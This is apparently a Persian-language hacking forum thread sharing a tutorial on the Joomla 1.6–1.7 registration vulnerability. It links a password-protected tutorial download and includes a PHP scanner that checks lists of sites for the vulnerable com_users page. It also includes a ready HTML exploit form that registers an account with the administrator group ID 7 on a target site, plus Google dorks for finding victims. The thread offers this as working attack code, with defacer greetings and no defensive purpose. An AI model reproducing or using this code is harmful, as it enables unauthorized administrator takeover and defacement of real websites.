SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

آموزش تصویری باگ ثبت نام جوملا

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • آموزش تصویری باگ ثبت نام جوملا

    سلام
    ===
    در این آموزش نحوه استفاده از حفره جدیدی که از جوملا پابلیک شد رو نشون میدیم
    خیلی ها با استفاده از این باگ مشکل داشتند
    لینک تصحیح شد
    دانلود
    http://uploaderx.persiangig.com/Register.zip/download
    پسورد : iranhack.com
    امید وارم مفید واقع شود ...:53:

    به قول دوست عزیزم : مارو چه به این حرفا. . .
     شیر برای اثبات شیر بودنش , نیازی به جنگیدن با هر شغالی را ندارد . تنها نیم نگاهش کافیست ...

  • #2
    RE: آموزش تصویری باگ ثبت نام جوملا

    مهندس لینکت مشکل داره !
    [align=center][/align]

    نظر


    • #3
      RE: آموزش تصویری باگ ثبت نام جوملا

      همچنان لینک مشکل دارد چون کلا لینکیوجود ندارد!!!

      نظر


      • #4
        RE: آموزش تصویری باگ ثبت نام جوملا

        لینک دانلود نیستش؟

        نظر


        • #5
          RE: آموزش تصویری باگ ثبت نام جوملا

          اصلا لینکی نیست .
           

          نظر


          • #6
            RE: آموزش تصویری باگ ثبت نام جوملا

            درود دوستان از لینک زیر آموزش باگ ریجیستر جوملا که مربوط به کامپونت com_users میباشد را میتوانید دانلود نمایید .

            کد:
            http://uploaderx.persiangig.com/Register.zip/download
            [align=center][/align]

            نظر


            • #7
              RE: آموزش تصویری باگ ثبت نام جوملا

              Checking Registration Exploit    

              کد:
                  <?
                          # Checking joomla 1.6 - 1.7 Registration Exploit
                          # Coded By : xSecurity
                          # Skype : b0x-sa
                          # 4u : Mr.Dm4r - Lov3rDNS - DamaneDz - r0kin - b0x - FoX HaCkEr
                          @set_time_limit(0);
                          echo "<form method='POST'>
                          <style>
                          textarea
                          {
                                  font-size: 15px;
                                  font-family: Tahoma;
                                  color: #0078AA;
                                  border: dashed 1pt #0078AA;
                          }
                          input
                          {
                                  color: #0078AA;
                                  border: dotted 1pt #0078AA;
                          }
                          </style>
                          <title>Checking joomla 1.6 - 1.7 Registration Exploit</title>
                          <body text='#808080' bgcolor='#FFFFFF'>
                          <p align='center' dir='ltr'><b><br>
                          <font face='Tahoma' size='7' color='#0078AA'>C</font><font face='Tahoma' size='5'>hecking</font><font face='Tahoma' size='7'>
                          <font color='#0078AA'>R</font></font><font face='Tahoma' size='5'>egistration</font><font face='Tahoma' size='7'>
                          <font color='#0078AA'>E</font></font><font face='Tahoma' size='5'>xploit</font></b></p><center>
                          <textarea name='sites' cols='50' rows='10'></textarea><br>
                          <input type='submit' name='scan' value='Scan Sites'><br>
                          </form>";
                         
                          if($_POST['scan'])
                                  {
                          $site = explode("\r\n",$_POST['sites']);
                          foreach($site as $sites)
                          {
                                  $curl = curl_init("{$sites}/index.php?option=com_users&view=registration");
                                  curl_setopt($curl, CURLOPT_FAILONERROR, true);
                                  curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
                                  curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
                                  $result = curl_exec($curl);
                                          if(eregi("jform_email2-lbl",$result))
                                          {
                                                  echo "<font face='Comic Sans MS'>
                                                  <a href='{$sites}/index.php?option=com_users&view=registration' style='text-decoration: none'>{$sites}</a>
                                                  <font color='green'>Infected</font></font><br>";
                                          }
                                          else
                                          {
                                                  echo "<font face='Comic Sans MS'>{$sites}
                                                  <font color='red'>Not Infected</font></font><br>";
                                          }
                          }
                                  }
                          echo "<p dir='ltr' align='center'><font face='Verdana' size='2'>Coded By : <font color='#0078AA'>xSecurity</font> - Skype : <font color='#0078AA'>b0x-sa </font> <br>
                          <span lang='en-us'><b><a href='http://sec4ever.com/'>
                          <img border='0' src='http://www.sec4ever.com/home/sec4ever_2.0/images/statusicon/forum_new.png' width='60' height='65'></a><a href='http://is-sec.com/'><img src='http://is-sec.com/vb/images/Is/images/logo-is.png' width='132' height='69'></a></b></span><br>
                          4u : <font color='#0078AA'>Mr.Dm4r</font> - <font color='#0078AA'>Lov3rDNS</font> - <font color='#0078AA'>DamaneDz</font> -
                          <font color='#0078AA'>r0kin</font> - <font color='#0078AA'>b0x</font> -<font color='#0078AA'> FoX HaCkEr</font></font></p></body>";
                  ?>

              نظر


              • #8
                RE: آموزش تصویری باگ ثبت نام جوملا

                اینم اکسپلویت بعدی مربوط به این باگ

                کد:
                   
                
                    <body bgcolor="#000000" background="blank">
                    <font color=#00ff00>
                    <br><center><font face="arial" color="RED" size="4">Exploit :
                    <br>
                    index.php?option=com_users&view=registration</font><font face="ARIALBLACK"
                    color="white">
                     
                    <form id="member-registration" action="http://www.site.com/index.php/component/users/?task=registration.register" method="post" class="form-validate">
                    <fieldset>
                    <legend>User Registration</legend><dl><dt><span class="spacer"><span class="before"></span><span class="text"><label id="jform_spacer-lbl" class=""><strong class="red">*</strong> Required field</label></span><span class="after"></span></span>                                                              </dt>
                                                    <dd> </dd>
                                                                                                                    <dt>
                                                    <label id="jform_name-lbl" for="jform_name" class="hasTip required" title="Name::Enter your full name">Name:<span class="star"> *</span></label>                                                           </dt>
                                                    <dd><input type="text" name="jform[name]" id="jform_name" value="AndikaHNc" class="required" size="30"/></dd>
                                                                                                                    <dt>
                                                    <label id="jform_username-lbl" for="jform_username" class="hasTip required" title="Username::Enter your desired user name">Username:<span class="star"> *</span></label>                                                           </dt>
                                                    <dd><input type="text" name="jform[username]" id="jform_username" value="AndikaHNc" class="validate-username required" size="30"/></dd>
                                                                                                                    <dt>
                                                    <label id="jform_password1-lbl" for="jform_password1" class="hasTip required" title="Password::Enter your desired password - Enter a minimum of 4 characters">Password:<span class="star"> *</span></label>                                                                </dt>
                                                    <dd><input type="password" name="jform[password1]" id="jform_password1" value="abay" autocomplete="off" class="validate-password required" size="30"/></dd>
                                                                                                                    <dt>
                                                    <label id="jform_password2-lbl" for="jform_password2" class="hasTip required" title="Confirm Password::Confirm your password">Confirm Password:<span class="star"> *</span></label>                                                                </dt>
                                                    <dd><input type="password" name="jform[password2]" id="jform_password2" value="apaajaboleh" autocomplete="off" class="validate-password required" size="30"/></dd>
                                                                                                                    <dt>
                                                    <label id="jform_email1-lbl" for="jform_email1" class="hasTip required" title="Email Address::Enter your email address">Email Address:<span class="star"> *</span></label>                                                         </dt>
                                                    <dd><input type="text" name="jform[email1]" class="validate-email required" id="jform_email1" value="[email protected]" size="30"/></dd>
                                                                                                                    <dt>
                                                    <label id="jform_email2-lbl" for="jform_email2" class="hasTip required" title="Confirm email Address::Confirm your email address">Confirm email Address:<span class="star"> *</span></label>                                                               </dt>
                                                    <dd><input type="text" name="jform[email2]" class="validate-email required" id="jform_email2" value="[email protected]" size="30"/></dd>
                    <input name="jform[groups][]" value="7" size="30">
                                                                                    </dl>
                                    </fieldset>
                                            <div>
                                            <span class="wto-button-wrapper"><span class="wto-button-l"> </span><span class="wto-button-r"> </span><button type="submit" class="button validate wto-button">Register</button></span>
                                            or                      <a href="/" title="Cancel">Cancel</a>
                                            <input type="hidden" name="option" value="com_users" />
                                            <input type="hidden" name="task" value="registration.register" />
                                            <input type="hidden" name="c74b0a0fc27dea74f837b327b1feb230" value="1" />               </div>
                            </form>
                     
                    <hr>
                    </div></font></center><br><center><font face="arial" color="RED" size="4"><font face="arial" color="white" size="4">#</font>Indonesian </font><font face="arial" color="white" size="4">Hacker</font><font face="ARIALBLACK"
                     
                    color="white"><marquee direction="left"loop="true" scrollamount="300"
                     
                    ><b>__________________________________________________________________________________________
                     
                    ___________________________________________________________________________________________</b
                     
                    ></marquee></font><script type="text/javascript">
                    writeContent(true);
                    </script>
                     
                    </script><center>
                    <p dir="ltr" align="center"><span lang="en-us"> <font color="#00FF00" face="Century Gothic">Greetz:</font></span><font color="#00FF00" face="Century Gothic">
                      <marquee width="591">Positive | Catalyst71 | xCrotz |  Tonihoshi | Hand_Java | Dhaputz | Rendy | all Indonesian Defacer And You !!! </marquee>
                      </font></p>
                    </font>
                    <font face="ARIALBLACK" color="white">
                     
                    <marquee loop="true" direction="right"
                     
                    scrollamount="300"><b>________________________________________________________________________
                     
                    ______________________________________________________________________________________________
                     
                    _______________</b></marquee></font>
                    </div></font></center><br><center><font face="arial" color="RED" size="4">#HN-Comunity | #Indonesian Security Down | #Medan Cyber Team  </font><font face="ARIALBLACK"
                    color="white">
                    <br>
                    <br>
                    <font face="Courier New" size="3"><font color="white"><i> ©Copyroot 2013 by <a href="http://tutorial-update.blogspot.com/">AndikaHNc</a> </a></i></font><br></p>
                    </body>
                    </html>
                    </body>
                    </html>

                خیلی چیز شاخی نیست اما واسه اونایی که زیاد حال ندارن خوبه طرف اومده ابجکت ها رو در قالب html تعریف کرده و در action باید لینک سایت آسیب پذیرو بزنید .

                کد:
                action="http://www.site.com/index.php/component/users/?task=registration.register"
                [align=center]زشیر شتر خوردن و سوسمار            عرب را به جایی رسیده ست کار

                که تاج کیانی کند آرزو                     تفو بر تو ای چرخ گردون تفو
                [/align]

                نظر


                • #9
                  RE: آموزش تصویری باگ ثبت نام جوملا

                  sample
                  کد:
                  http://www.site.com/index.php?option=com_users&view=registration
                  dork
                  کد:
                  intext:"Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors. site:gr"
                  
                  inurl:index.php?option=com_users
                  [align=center]زشیر شتر خوردن و سوسمار            عرب را به جایی رسیده ست کار

                  که تاج کیانی کند آرزو                     تفو بر تو ای چرخ گردون تفو
                  [/align]

                  نظر

                  صبر کنید ..
                  X